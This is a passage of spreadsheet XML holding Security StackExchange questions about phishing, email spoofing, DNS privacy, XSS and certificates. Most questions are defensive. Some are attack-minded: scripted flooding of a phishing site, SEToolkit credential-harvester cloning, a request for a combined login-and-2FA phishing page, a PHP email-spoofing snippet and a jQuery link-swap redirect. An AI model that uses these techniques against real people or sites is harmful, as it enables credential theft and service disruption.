 &lt;p&gt;So my question is, can wav files be used for tracking when an email is opened and get around the default picture blocking behaviour?&lt;/p&gt;</t>
  </si>
  <si>
    <t>user21377</t>
  </si>
  <si>
    <t>What are the privacy pros and cons of using a public DNS server vs. your own?</t>
  </si>
  <si>
    <t>&lt;p&gt;Whether I'm using a normal internet connection setup, or tunnelling it through an anonymizing VPN or through TOR, what information of mine is revealed to whatever DNS server that I choose (e.g. &lt;a href="https://developers.google.com/speed/public-dns/"&gt;Google Public DNS&lt;/a&gt;)?&lt;/p&gt;
 &lt;p&gt;Would I gain any privacy benefits if I created and used my own DNS server (either on my own dedicated linux server on the internet or on my own PC system locally)?&lt;/p&gt;
 &lt;p&gt;But on the other hand, might there be any privacy &lt;em&gt;disadvantage&lt;/em&gt; to using my own DNS server that I'm not thinking of? (Like some form of leakage/attack whereby the DNS server you use is exposed to some website - and if you use something like TOR or a VPN, the IP address of your &lt;em&gt;own&lt;/em&gt; DNS server has been leaked and so your anonymity is still compromised, in that way?)&lt;/p&gt;
 &lt;p&gt;I am not so concerned about &lt;em&gt;security&lt;/em&gt; (for example someone hacking my (amateurly-protected) DNS server and redirecting domains to phishing IPs to steal my information or identity), but mainly &lt;em&gt;privacy&lt;/em&gt;.&lt;/p&gt;
 &lt;p&gt;Thanks.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;privacy&gt;&lt;dns&gt;&lt;google&gt;&lt;server&gt;&lt;user-tracking&gt;</t>
  </si>
  <si>
    <t>user159569</t>
  </si>
  <si>
    <t>Why are extended validation certificates not used with email</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;a href="https://en.wikipedia.org/wiki/Extended_Validation_Certificate" rel="nofollow noreferrer"&gt;Extended validation certificates&lt;/a&gt; are identity certificates issued to a legal entity. This means that anything signed by that certificate is "guaranteed" to come from the entity instead of just from the domain name.&lt;/p&gt;
 &lt;p&gt;Since phishing emails are a big deal and (at least in my mind) appear to be growing in prevalence, why don't companies sign emails using these certificates (and include the signature as an attachment)?&lt;/p&gt;
 &lt;p&gt;The trust infrastructure is already (mostly) in place and the verification could be handled fairly transparently by email clients using the OS or browser certificate store.&lt;/p&gt;
 &lt;p&gt;I imagine that this could render many of the "ENTER YOU BANKING CREDENTIALS IN 24 HOURS OR ACCOUNT WILL BE DELETE" emails and other, better crafted phishing emails, largely useless to the phishers.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;certificates&gt;&lt;email&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Is there a way I can shut down this phishing website?</t>
  </si>
  <si>
    <t>&lt;p&gt;I found a fake PayPal phishing website, and I want to shut it down, I have run my script that sends many requests to this website with randomize emails and password, but it is not fully shut it down.&lt;/p&gt;
 &lt;p&gt;When I refresh the website it takes like 10 sec to load, but it is still working, it seems like this website is powerful...&lt;/p&gt;
 &lt;p&gt;Are there any suggestions to shut down this website? &lt;/p&gt;
 &lt;p&gt;I'm currently searching for phishing websites, and so far I've dropped two phishing sites, that's my job.&lt;/p&gt;</t>
  </si>
  <si>
    <t>Unsolicited opt-out from data brokers</t>
  </si>
  <si>
    <t>&lt;p&gt;I received several automated emails at an early hour from several data brokers (e.g., Spokeo) asking me to confirm an opt-out for my email address and name. I did not request these, but did so about 2 years ago from most data brokers, and accidentally clicked on one of the links. The originating email address as well as the domain/IP from the email server look legitimate and the links go to the appropriate domain. &lt;/p&gt;
 &lt;p&gt;I am somewhat concerned because it happened within a short period on several brokers that ostensibly are separately owned, suggesting a human may have done this manually. On the other hand, it seems more strange the malicious. Is there any reason a malicious third party might be doing this?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Revoke Let's Encrypt CA for all devices in my organization?</t>
  </si>
  <si>
    <t>&lt;p&gt;If I disagree with Let's Encrypt's cavalier attitude about SSL certificate issuance, and their indifference to their auto-generated certificates potentially being using for widespread criminal activities, how can I automatically disable all of my organization's web browsers and other software that uses internally stored lists of certificate authorities, from accepting their certificates and preventing end-user exposure to the threat of phishing sites using Let's Encrypt SSL? &lt;/p&gt;
 &lt;p&gt;Let's Encrypt has abdicated all responsibility for HTTPS / SSL to be used to validate the authenticity of a website and its content as valid.&lt;/p&gt;
 &lt;p&gt;Although it is possible to abuse certificates from standard authorities, there is a revocation process in place to deal with that. When a bad actor has been identified and they lose their certificate, it is an expensive and time-consuming process for the bad actor to obtain a new replacement to begin scamming again. The bad actor will of course be banned from using the previous CA, which will tell other CA's what happened, and so the criminal has to find another unrelated CA... and then another... etc. &lt;/p&gt;
 &lt;p&gt;But Let's Encrypt has thrown all this out the window, stating that the potential for criminal abuse of their easily auto-distributed free SSL certificates are just Not Their Problem, and they're not going to bother with trying to prevent it.&lt;/p&gt;
 &lt;p&gt;Due to the fact that certificate authorities are authorized via a process that involves individual web browsers without any other local infrastructure, it would seem that revoking Let's Encrypt across all devices in my organization may require manual intervention on every web browser or operating system that uses an internally stored list of trusted global certificate authorities.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;tls&gt;&lt;certificate-authority&gt;&lt;certificate-revocation&gt;&lt;letsencrypt&gt;</t>
  </si>
  <si>
    <t>is it possible to intercept network packets outside lan?</t>
  </si>
  <si>
    <t>&lt;p&gt;User A is in a different country than user B and they have different IP ranges and ISPs.&lt;/p&gt;
 &lt;p&gt;Is it possible for A to intercept B's communication sent to a third party, without using techniques like malware attacks, phishing, etc. I.E without access to B's computer. &lt;/p&gt;
 &lt;p&gt;Sort of what you see in Hollywood movies. &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;network&gt;&lt;man-in-the-middle&gt;&lt;routing&gt;&lt;internet&gt;</t>
  </si>
  <si>
    <t>XSS on marketing websites like craigslist. How does this work on a technical level?</t>
  </si>
  <si>
    <t>&lt;p&gt;I was wondering how this works.
 We have a marketing site in Holland where people can sell second hand goods.
 Rumor goes that there is a lot of phishing going on there and XSS code is used in the images that are uploaded to the site for malicious intent.&lt;/p&gt;
 &lt;p&gt;Can someone explain to me how this works and how people can stay out of trouble?
 I have some theoretical understanding of protocols and scripting.
 Examples or 3rd party source for clarification are most appreciated.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;xss&gt;&lt;server&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Firefox presenting a Deceptive Site warning when trying to download a popular github resource. Should I ignore it?</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;em&gt;I don't want to name names (in case it gets them some bad publicity for any party) however if there is a call for, then I can.&lt;/em&gt;&lt;/p&gt;
 &lt;p&gt;I went to a website of a popular templating/framework system in order to download the latest version for a new project. On their homepage they have a link to download the latest version from their github repo. The link appears fine, it's a zip from the releases as you would suspect. However on clicking the link (or navigating to the address in Firefox) the link is redirected to an AWS url and Firefox returns a 'Deceptive Site!' page (which I can ignore) stating it could be phishing or malware.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Should I ignore this deceptive site warning?&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Is Firefox just being overly cautious?&lt;/strong&gt; (change in domain on redirection)&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Is there something genuingly bad happening and the relevant orgs should be informed?&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;The same url is available through github itself (the releases page) and is doing the same thing, redirecting and presenting a warning.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web-browser&gt;&lt;phishing&gt;&lt;github&gt;</t>
  </si>
  <si>
    <t>Why an invisible iframe to logout from Office in a Office phishing?</t>
  </si>
  <si>
    <t>&lt;p&gt;In a phishing page for Office account (login mimicking the normal login page and stealing the credentials through a simple ajax request, then navigating to a dummy public google doc), attackers have put an invisible &lt;code&gt;iframe&lt;/code&gt; with the url &lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;https://login.microsoftonline.com/logout.srf?ct=1548343592&amp;amp;rver=64.4.6456.0&amp;amp;lc=1033&amp;amp;id=501392
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Why would they do that? I don't see the point.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;office&gt;</t>
  </si>
  <si>
    <t>Automated browser-level countermeasures to look-alike login pages</t>
  </si>
  <si>
    <t>&lt;p&gt;For example, say an unsuspecting visitor gets a link &lt;a href="http://fiddle.jshell.net/hDCPW/show/" rel="nofollow noreferrer"&gt;security.stackexchange.com/...&lt;/a&gt;. Then it re-opens the login page, with or without an explanation as to why they have to log in again. (this is more likely to be a problem for place like Cooking or Music than a community of Security enthusiasts)&lt;/p&gt;
 &lt;p&gt;At least in StackExchange there is an extra layer of security in that it takes one more click &lt;a href="http://jsfiddle.net/WdWWb/show/" rel="nofollow noreferrer"&gt;to get to the Google login&lt;/a&gt;.&lt;/p&gt;
 &lt;p&gt;But other services do not have that. These example pages &lt;strong&gt;could have been crafted to submit login information to a third party&lt;/strong&gt;. Then bring up &lt;a href="http://code.google.com/edu/test" rel="nofollow noreferrer"&gt;one of Google's better known error pages&lt;/a&gt; and re-word it to say that the service is temporarily unavailable, and to please &lt;a href="https://security.stackexchange.com/users/login?returnurl=%2fquestions%2fask"&gt;try again in a couple minutes&lt;/a&gt;.&lt;/p&gt;
 &lt;p&gt;A non-techie user is now hacked. Teaching them about these attacks is going to be incomplete.&lt;/p&gt;
 &lt;p&gt;But what about automatic ways to detect pages like these?&lt;/p&gt;
 &lt;p&gt;Is there any screen-shot recognition plugin? Or resource recognition? That IT Security logo for example, is a resource. All the resources could be check-summed, and identified to their domain name. I visit this page often, so it is pretty clear that the logo belongs here, and not on any other sites I visit.&lt;/p&gt;
 &lt;p&gt;This could warn the user of some of the more simply crafted hacks that are still under the radar and &lt;a href="http://www.mozilla.org/en-US/firefox/phishing-protection/" rel="nofollow noreferrer"&gt;not detected &amp;amp; reported yet&lt;/a&gt;.&lt;/p&gt;
 &lt;p&gt;What is there to know on this subject?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web-browser&gt;&lt;countermeasure&gt;&lt;automated-testing&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>SEToolkit Not Cloning Login Page</t>
  </si>
  <si>
    <t>&lt;p&gt;I am trying to clone a login page with SEToolkit in the latest version of Kali Linux. SEToolkit simply isn't working. I have tried running it with normal user privileges and sudo. I have placed in all the following options&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;(1) Social-Engineering Attacks&lt;/p&gt;
 &lt;p&gt;(2) Website Attack Vectors&lt;/p&gt;
 &lt;p&gt;(3) Credential Harvester Attack Method&lt;/p&gt;
 &lt;p&gt;(2) Site Cloner&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;I placed in all of the necessary information afterward. This is the only message I receive&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;[&lt;em&gt;] You may need to copy /var/www/&lt;/em&gt; into /var/www/html depending on where your directory structure is.&lt;/p&gt;
 &lt;p&gt;Press {return} if you understand what we're saying here.&lt;/p&gt;
 &lt;p&gt;[*] The Social-Engineer Toolkit Credential Harvester Attack&lt;/p&gt;
 &lt;p&gt;[*] Credential Harvester is running on port 80&lt;/p&gt;
 &lt;p&gt;[*] Information will be displayed to you as it arrives below:&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;It just hangs after that. I am expecting tons of information to fly across the terminal screen, but nothing happens. I checked the /www/var/ directory as well as the HTML directory and nothing is populating.&lt;/p&gt;
 &lt;p&gt;This is a very straightforward tool and I have had no problems with it in the past. I do in fact have internet and I can, in fact, access the login page of the site I am attempting to clone. I attempted to clone multiple sites with the same results. I don't know what other criteria is necessary for this process to work as expected. How can I further diagnose this issue? What else can I check?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;web-application&gt;&lt;phishing&gt;&lt;kali-linux&gt;</t>
  </si>
  <si>
    <t>Can I be hacked just by watching a stream from a youtube channel that is being hacked?</t>
  </si>
  <si>
    <t>&lt;p&gt;A few days ago I joined a stream on a youtube channel that I later discovered was being hacked.
 That got me thinking. Is it possible to have been infected with some type of virus just by accessing the stream (By this I mean that I didn't click on links or add. I just opened the stream on the youtube page)?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Phishing attacks with two factor authentication</t>
  </si>
  <si>
    <t>&lt;p&gt;Making our own phishing page isn't a big deal. Copying source code from website and modifying link just does our job. But what if we want to add phishing page for 2FA in the same code?&lt;/p&gt;
 &lt;p&gt;Consider the scenario
 Attacker and Victim are both on same network (router) without any firewall.&lt;/p&gt;
 &lt;p&gt;Attacker burps victim with a phishing page and forces to login.&lt;/p&gt;
 &lt;p&gt;When victim login attacker gets the information. He enters that information through his own device.&lt;/p&gt;
 &lt;p&gt;Now the website asks for 2FA.So attacker makes a 2FA phishing page and sends it to victim. &lt;/p&gt;
 &lt;p&gt;Victim unaware that 2FA was he received was for another device inputs the code.&lt;/p&gt;
 &lt;p&gt;Attacker gets 2FA credentials and inputs it in his device. 
 Maybe it can work.&lt;/p&gt;
 &lt;p&gt;My question is that is it possible to combine code for login page and 2FA page into single code and how. 
 In short when attacker inputs his login details and clicks login he should directly get 2FA page.&lt;/p&gt;
 &lt;p&gt;I want method&lt;/p&gt;</t>
  </si>
  <si>
    <t>Phishing/Malware redirection through AdExchange on Android</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;strong&gt;Issue:&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;Yesterday I discovered a strange behaviour in the &lt;a href="https://play.google.com/store/apps/details?id=de.pixelhouse&amp;amp;hl=de" rel="nofollow noreferrer" title="Chefkoch App on Google Playstore"&gt;Chefkoch.de App&lt;/a&gt;. During the search for recipe,&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/Gsemfm.jpg" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/Gsemfm.jpg" alt="Example, happened on multiple recipies"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Firefox opens up with a (German) phishing warning screen.&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/7BSgem.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/7BSgem.png" alt="German phishing prevention screen"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;This happened not only on this specific recipe, but on almost every other recipe. My assumption is that it has something to do with the displayed ads.
 The AEG ad was one of the ads displayed during the issue.&lt;/p&gt;
 &lt;hr&gt;
 &lt;p&gt;&lt;strong&gt;Incidence Response:&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;Immediately after the attack I wrote an email to the developers.
 Today I got their answer, that this problem is &lt;em&gt;not&lt;/em&gt; new to them, and they think it has something to do with &lt;em&gt;Googles AdExchange&lt;/em&gt; service.&lt;/p&gt;
 &lt;p&gt;Today I tried to analyse the issue a bit more, but I wasn't able to recreate the issue again. I will update my Question with further information if I'll be able to recreate the issue.&lt;/p&gt;
 &lt;hr&gt;
 &lt;p&gt;&lt;strong&gt;Question:&lt;/strong&gt;&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;Has anybody knowledge on such attacks? (Google didn't help me.)&lt;/li&gt;
 &lt;li&gt;How is it possible to create a browser intent, without user interaction, via ads?&lt;/li&gt;
 &lt;/ol&gt;
 &lt;hr&gt;
 &lt;p&gt;&lt;strong&gt;Technical Details&lt;/strong&gt;&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;strong&gt;App Version&lt;/strong&gt; 2.2.8&lt;/li&gt;
 &lt;li&gt;&lt;strong&gt;Android Version:&lt;/strong&gt; 5.1.1&lt;/li&gt;
 &lt;li&gt;&lt;strong&gt;Device:&lt;/strong&gt; Oneplus One&lt;/li&gt;
 &lt;li&gt;&lt;strong&gt;User-Agent:&lt;/strong&gt; Mozilla/5.0 (Android; Mobile; rv:40.0) Gecko/40.0 Firefox/40.0&lt;/li&gt;
 &lt;li&gt;&lt;strong&gt;Time:&lt;/strong&gt; 01.09.2015 17:10:48&lt;/li&gt;
 &lt;/ul&gt;
 &lt;hr&gt;
 &lt;p&gt;&lt;strong&gt;Edit&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;Some latest research in this field showed an overall Problem of the advertising networks. 
 &lt;a href="https://blog.malwarebytes.org/malvertising-2/2015/09/large-malvertising-campaign-goes-almost-undetected/" rel="nofollow noreferrer"&gt;https://blog.malwarebytes.org/malvertising-2/2015/09/large-malvertising-campaign-goes-almost-undetected/&lt;/a&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;android&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Vulnerability : Missing SPF - is this a scam?</t>
  </si>
  <si>
    <t>&lt;p&gt;I got an email with the following:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;I am just looking at your SPF records then found following. SPF Records missing safe check which can allow me to send mail and phish easily any victim.
 PoC:
 &amp;lt;?php
 $to = &amp;quot;VICTIM@example.com&amp;quot;;
 $subject = &amp;quot;Password Change&amp;quot;;
 $txt = &amp;quot;Change your password by visiting here - [VIRUS LINK HERE]l&amp;quot;;
 $headers = &amp;quot;From: https://www.alidropstore.com/&amp;quot;;
 mail($to,$subject,$txt,$headers);
 ?&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;It then goes on to show my SPF records and shows that they are valid. I ran the domain through some SPF checkers and all good.&lt;/p&gt;
 &lt;p&gt;My question is whether this is just a chancer, whether they have a legit point or anything else? The PoC just sends the email to spam and says the email address is not valid.&lt;/p&gt;
 &lt;p&gt;Thanks&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;email-spoofing&gt;&lt;spf&gt;</t>
  </si>
  <si>
    <t>Australia's Legal Do's and Don'ts of Hacking</t>
  </si>
  <si>
    <t>&lt;p&gt;Just wondering what methods used in Pen-testing (Denial of service, dropping a shell, phishing, etc.) would land you in legal trouble in Australia?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;penetration-test&gt;&lt;legal&gt;</t>
  </si>
  <si>
    <t>How to secure yourself against jQuery preventDefault phishing?</t>
  </si>
  <si>
    <t>&lt;p&gt;This is bugging me for a while now due to the potential security risk it involves.&lt;/p&gt;
 &lt;p&gt;Basicly by accident I discovered that this code is perfectly valid and works without a problem:&lt;/p&gt;
 &lt;p&gt;jQuery:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;$(document).ready(function(){
  $("#phishingURL").on("click",function(e){
  e.preventDefault();
  window.location = "https://www.stackoverflow.com";
  });
 });
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;HTML:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;lt;a id="phishingURL" href="https://www.google.com"&amp;gt;https://www.google.com&amp;lt;/a&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Most normal PC users just hover a URL to check if it actually directs towards the website they're expecting. In this type of phishing, you get to see the url you expect, yet you're still redirected to a different website. Ofcourse you can always check the address bar etc. But as I work a lot with older people, I know they're going to fall for this. So is there any way to protect yourself against this besides changing your habits?&lt;/p&gt;
 &lt;p&gt;Edit: Technically it's possible to use Flash on the pshishing site itself and change the browser address bar with &lt;code&gt;SWFAddress.setValue()&lt;/code&gt;, making it even possible to make the address bar appear as if it's on the right website.&lt;/p&gt;</t>
  </si>
  <si>
    <t>How to get help from an ISP to take down a phishing campaign?</t>
  </si>
  <si>
    <t>&lt;p&gt;My company is suffering from a phishing campaign. Over the last two months we have tried to issue a take down to the ISPs (publicdomainregistry.com and confluence-networks.com) ‚Äì both of them seem to have connections. However, after bunch of e-mails and phone calls nothing changes, and the fraudulent websites still exist, and continue to collect valuable information from the customers and even replicate to new domains. &lt;/p&gt;
 &lt;p&gt;Can someone help me out and tell me what to do if ISP is not cooperative ? &lt;/p&gt;</t>
  </si>
  <si>
    <t>How do I protect myself against SIM hijacking/social engineering?</t>
  </si>
  <si>
    <t>&lt;p&gt;There are several posts like these:&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://medium.com/@N/how-i-lost-my-50-000-twitter-username-24eb09e026dd" rel="nofollow noreferrer"&gt;https://medium.com/@N/how-i-lost-my-50-000-twitter-username-24eb09e026dd&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://motherboard.vice.com/en_us/article/5984zn/listen-to-sim-jacking-account-ransom-instagram-email-tmobile" rel="nofollow noreferrer"&gt;https://motherboard.vice.com/en_us/article/5984zn/listen-to-sim-jacking-account-ransom-instagram-email-tmobile&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;How does one protect themselves against an attack like this?&lt;/p&gt;
 &lt;p&gt;What are the specific logistics behind services or phones or technologies that can be used to create a structure which isn't vulnerable to this? And how does the data flow through it?&lt;/p&gt;
 &lt;p&gt;Also, how do high risk people like celebrities handle stuff like this? &lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Edit&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;These are the things that are most critical to protect&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;Cellular account if used for any SMS (but maybe it can be avoided entirely by only using email recovery?)&lt;/li&gt;
 &lt;li&gt;A "root" email account that is for recovery&lt;/li&gt;
 &lt;li&gt;Domain accounts (eNome, namecheap, etc)&lt;/li&gt;
 &lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;account-security&gt;&lt;social-engineering&gt;&lt;sms&gt;&lt;simcard&gt;</t>
  </si>
  <si>
    <t>Secure OAuth 2 flow for client-side or mobile app</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm implementing an API and a client-side web app, and they are supposed to communicate via an API and use OAuth 2 for authentication.&lt;/p&gt;
 &lt;p&gt;I can't get over my confusion on what's the right way to authenticate users (i.e. without major security oversights).&lt;/p&gt;
 &lt;p&gt;I gathered the following:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Ideally, you should expose a web form on the API server which takes username and password and redirects back with an authorisation code, to be exchanged client-side for an access token access token.&lt;/li&gt;
 &lt;li&gt;The approach I described is considered cumbersome, so OAuth 2 offers an implicit flow where the client-side app makes a request containing a &lt;code&gt;client_id&lt;/code&gt; and the user's credentials, which it gathers. It receives an access token.&lt;/li&gt;
 &lt;li&gt;Authentication toolkits seem to be wary of allowing only the &lt;code&gt;client_id&lt;/code&gt; to be passed, and instead &lt;a href="https://github.com/jaredhanson/passport-oauth2-client-password/issues/11" rel="nofollow noreferrer"&gt;require the &lt;code&gt;client_secret&lt;/code&gt; to be included.&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;Based on the previous point, as a developer you may have to embed your &lt;code&gt;client_secret&lt;/code&gt; in the distributable application, thus making it public.&lt;/li&gt;
 &lt;li&gt;Some peers with an understanding of OAuth 2 told me that it is not uncommon for developers to embed the &lt;code&gt;client_secret&lt;/code&gt; in their distributables, and that some high-profile services (allegedly Twitter) do it as well.&lt;/li&gt;
 &lt;li&gt;If you add a proxy between the client and the OAuth 2 server to add the &lt;code&gt;client_secret&lt;/code&gt; to requests, it doesn't improve security as it is similar to ignoring the &lt;code&gt;client_secret&lt;/code&gt; altogether.&lt;/li&gt;
 &lt;li&gt;The only security concern that I could find related to embedding &lt;code&gt;client_id&lt;/code&gt; and &lt;code&gt;client_secret&lt;/code&gt; in the client is that an attacker may implement their own client which, when given user credentials, may act on behalf of the user. This does not seem a likely attack, as phishing is similar and yields bigger benefits.&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;The following questions are still unanswered for me:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;What is the difference between the &lt;a href="https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-27#section-1.3.4" rel="nofollow noreferrer"&gt;Client Credentials flow&lt;/a&gt; and the &lt;a href="https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-27#section-1.3.3" rel="nofollow noreferrer"&gt;Resource Owner Password flow&lt;/a&gt;? Which one should I prefer? The answers to &lt;a href="https://stackoverflow.com/questions/22077487/difference-between-the-resource-owner-password-flow-and-the-client-credential"&gt;this question&lt;/a&gt; do not give me a clear understanding of the difference.&lt;/li&gt;
 &lt;li&gt;Are there any major security concerns with using the implicit flow, or is it viable?&lt;/li&gt;
 &lt;li&gt;Is embedding the &lt;code&gt;client_secret&lt;/code&gt; safe?&lt;/li&gt;
 &lt;/ol&gt;
 &lt;ul&gt;
 &lt;li&gt;If not, what is the alternative? Should I still require a &lt;code&gt;client_id&lt;/code&gt;, or allow using &amp;quot;public&amp;quot; (unregistered) clients?&lt;/li&gt;
 &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;oauth&gt;&lt;client-side&gt;&lt;api&gt;&lt;secret-sharing&gt;</t>
  </si>
  <si>
    <t>Is there any definitive way to tell if an email is a phishing attempt?</t>
  </si>
  <si>
    <t>&lt;p&gt;Is there any definitive way to tell if an email is a phishing attempt? What cues should the "average computer" user employ to detect a phishing email?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Phishing email from Avast - Headers look totally legit?</t>
  </si>
  <si>
    <t>&lt;p&gt;Below is the email with headers. I never registered on the site, so it's clearly phishing, but the links in the email point to the real Avast site. The delivery path also looks legit since both IP addresses (77.234.40.28 and 5.45.62.32) belong to Avast according to whois. I received this through my own Postfix SMTP server.&lt;/p&gt;
 &lt;p&gt;I can think of only two explanations:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;Avast is spamming people to increase its user base (unlikely?)&lt;/li&gt;
 &lt;li&gt;Someone else registered using my email address (accidentally?)&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;Is there an alternate explanation I missed?&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Return-Path: &amp;lt;myavast@avast.com&amp;gt;
 X-Original-To: redacted@redacted.com
 Delivered-To: redacted@helios.redacted.com
 X-Greylist: delayed 00:06:20 by SQLgrey-1.8.0
 Received: from prg18.ff.avast.com (prg18.ff.avast.com [77.234.40.28])
  by helios.redacted.com (Postfix) with ESMTP id 29FDE338513
  for &amp;lt;redacted@redacted.com&amp;gt;; Tue, 24 Feb 2015 16:31:39 +0000 (UTC)
 Received: from ams01-022.ff.avast.com (ams01-022.ff.avast.com [5.45.62.32])
  by prg18.ff.avast.com (Postfix) with ESMTP id 4AC4863FE
  for &amp;lt;redacted@redacted.com&amp;gt;; Tue, 24 Feb 2015 17:25:18 +0100 (CET)
 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=avast.com;
  s=default; t=1424795118;
  bh=xtbTFzHy9Gx8+0K7moXgMhL46s4Nd1+AiW/7CP7eGo4=;
  h=Date:From:To:Subject;
  b=KsOT6/s2YsnQ4P1ZSpgzbOjusgVHCzTBc/y2UdqTzbFec9rIMF4ayuzx1fmKpsIeh
  56CkPMIriPpJ/w8rNIEAA74rqUtXaTa6P+8CF+ePo0cDurc5+zvTFBLdx29NxWzpNa
  Pdsm/tnBF7mWyY67HAFIlNgKGiDq2YUX+rB/jp2I=
 Received: from ams01-022.ff.avast.com (localhost [127.0.0.1])
  by ams01-022.ff.avast.com (Postfix) with ESMTP id 2EE47120243
  for &amp;lt;redacted@redacted.com&amp;gt;; Tue, 24 Feb 2015 17:25:18 +0100 (CET)
 Date: Tue, 24 Feb 2015 17:25:18 +0100 (CET)
 From: AVAST Software &amp;lt;myavast@avast.com&amp;gt;
 To: redacted@redacted.com
 Message-ID: &amp;lt;2116255645.5085975.1424795118191.JavaMail.id@ams01-022.ff.avast.com&amp;gt;
 Subject: =?utf-8?Q?Avast_antivirus_account_=E2=80=93_please_confirm?=
 MIME-Version: 1.0
 Content-Type: multipart/mixed; 
  boundary="----=_Part_5085973_1976669953.1424795118189"
 ------=_Part_5085973_1976669953.1424795118189
 Content-Type: multipart/alternative; 
  boundary="----=_Part_5085974_319880981.1424795118189"
 ------=_Part_5085974_319880981.1424795118189
 Content-Type: text/html;
  charset=UTF-8
 Content-Transfer-Encoding: quoted-printable
 &amp;lt;?xml version=3D"1.0" encoding=3D"UTF-8"?&amp;gt;
 &amp;lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www=
 .w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&amp;gt;
 &amp;lt;html xmlns=3D"http://www.w3.org/1999/xhtml" xml:lang=3D"cs" lang=3D"cs"&amp;gt;
 &amp;lt;head&amp;gt;
 =09&amp;lt;meta http-equiv=3D"content-type" content=3D"text/html; charset=3Dutf-8"=
  /&amp;gt;
 &amp;lt;/head&amp;gt;
 &amp;lt;body&amp;gt;
 =09&amp;lt;div style=3D"padding-bottom:5px;"&amp;gt;&amp;lt;/div&amp;gt;You recently registered an AVAS=
 T Account. &amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt; Please click this link to verify your account: &amp;lt;br/&amp;gt;&amp;lt;=
 br/&amp;gt; &amp;lt;a href=3D"https://id.avast.com/en-us/confirm/registration?token=3DN1r=
 34hqKcwm6mBRkqLFub05pnfriPWmujAtoDTpqMhNH3FTE1T"&amp;gt;https://id.avast.com/en-us=
 /confirm/registration?token=3DN1r34hqKcwm6mBRkqLFub05pnfriPWmujAtoDTpqMhNH3=
 FTE1T&amp;lt;/a&amp;gt; &amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt; NOTE: Information email only =E2=80=93 PLEASE DO NOT R=
 EPLY &amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;AVAST Software&amp;lt;div style=3D"padding-top:5px;"&amp;gt;&amp;lt;a href=3D"htt=
 p://www.avast.com"&amp;gt;http://www.avast.com&amp;lt;/a&amp;gt;&amp;lt;/div&amp;gt;
 &amp;lt;/body&amp;gt;
 &amp;lt;/html&amp;gt;
